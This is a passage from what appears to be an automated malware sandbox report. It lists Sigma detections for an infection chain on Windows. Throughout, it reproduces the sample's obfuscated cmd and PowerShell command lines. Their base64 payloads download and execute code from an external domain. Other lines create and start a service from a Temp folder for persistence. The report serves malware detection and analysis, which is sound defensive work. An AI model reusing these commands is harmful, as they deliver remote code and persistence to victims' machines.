wBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
      Sigma detected: Suspicious New Service Creation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6160, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 7188, ProcessName: sc.exe
      Sigma detected: Suspicious PowerShell Encoded Command Patterns
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: >E(D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1868, ParentProcessName: cmd.exe, ProcessCommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 3340, ProcessName: powershell.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: >E(D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1868, ParentProcessName: cmd.exe, ProcessCommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 3340, ProcessName: powershell.exe
      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3340, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline", ProcessId: 8228, ProcessName: csc.exe
      Sigma detected: Suspicious Execution of Powershell with Base64
      Source: Process startedAuthor: frack113: Data: Command: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: >E(D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1868, ParentProcessName: cmd.exe, ProcessCommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 3340, ProcessName: powershell.exe
      Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , CommandLine|base64offset|contains: >E(D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1868, ParentProcessName: cmd.exe, ProcessCommandLine: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" , ProcessId: 3340, ProcessName: powershell.exe
      Sigma detected: Dynamic CSharp Compile Artefact
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3340, TargetFilename: C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline
      Sigma detected: Net.exe Execution
      Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6160, 